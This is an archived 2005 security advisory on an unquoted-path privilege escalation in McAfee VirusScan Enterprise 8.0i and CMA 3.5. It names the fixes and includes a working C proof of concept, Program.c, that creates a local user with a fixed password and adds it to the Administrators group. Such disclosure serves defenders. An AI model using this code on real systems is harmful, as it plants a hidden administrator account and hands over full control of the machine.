Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: v7-2195.htm

Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)



Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)



( Original article: http://reedarvin.thearvins.com/20051222-01.html ) 

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA 3.5 (patch 5) (http://www.mcafee.com/) 

Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the  naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named  Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.

Vulnerable Versions:
McAfee VirusScan Enterprise  8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."

Exploits:

// ===== Start Program.c =====#include 
#include 

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

     GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" ); 

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program 
Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c =====
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ ) 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH